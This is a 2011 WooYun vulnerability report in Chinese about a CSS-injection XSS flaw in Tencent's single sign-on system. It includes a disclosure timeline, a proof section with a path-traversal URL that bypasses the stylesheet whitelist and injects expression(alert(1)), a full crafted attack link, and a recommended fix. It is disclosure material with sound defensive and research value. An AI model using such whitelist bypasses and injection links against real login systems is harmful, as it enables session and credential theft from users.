当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02203

漏洞标题:腾讯单点登录系统CSS样式表注入漏洞

相关厂商:腾讯

漏洞作者: rayh4c

提交时间:2011-06-01 15:34

修复时间:2011-07-01 18:00

公开时间:2011-07-01 18:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-06-01: 细节已通知厂商并且等待厂商处理中
2011-06-01: 厂商已经确认,细节仅向厂商公开
2011-06-11: 细节向核心白帽子及相关领域专家公开
2011-06-21: 细节向普通白帽子公开
2011-07-01: 细节向实习白帽子公开
2011-07-01: 细节向公众公开

简要描述:

腾讯单点登录系统存在一个CSS样式表漏洞,导致可以注入脚本劫持使用单点登陆插件盗取用户的clientkey使用QQ服务.

详细说明:

腾讯单点登录系统有个CSS参数可以导入远程的样式表,CSS样式表URL有个白名单列表,开发人员只通过字符串搜索的方式匹配白名单,导致可以饶过该白名单限制.

漏洞证明:

如http://pengyou.qq.com/asset/login.css是白名单
那么通过一个搜索功能我们就能输出一段CSS样式表
http://pengyou.qq.com/asset/out.php?mod=outsearch&act=result&name=}body{x:expression(alert(1))}
由于开发人员只通过字符串搜索的方式匹配白名单URL,我们可以通过目录跳转符的方式访问CSS样式表链接
http://pengyou.qq.com/asset/login.css/../../out.php?mod=outsearch&act=result&name=}body{x:expression(alert(1))}
最后生成攻击链接
http://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=2&jumpname=&ptcss=&param=&css=http%3a%2f%2fpengyou.qq.com%2fasset%2flogin.css%2f..%2f..%2fout.php%3fmod%3doutsearch%26act%3dresult%26name%3d%7dbody%7bx%3aexpression(alert(1))%7d

修复方案:

严格匹配白名单,而不是通过字符串搜索的方式匹配白名单.

版权声明:转载请注明来源 rayh4c@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2011-06-01 16:15

厂商回复:

thx

最新状态:

暂无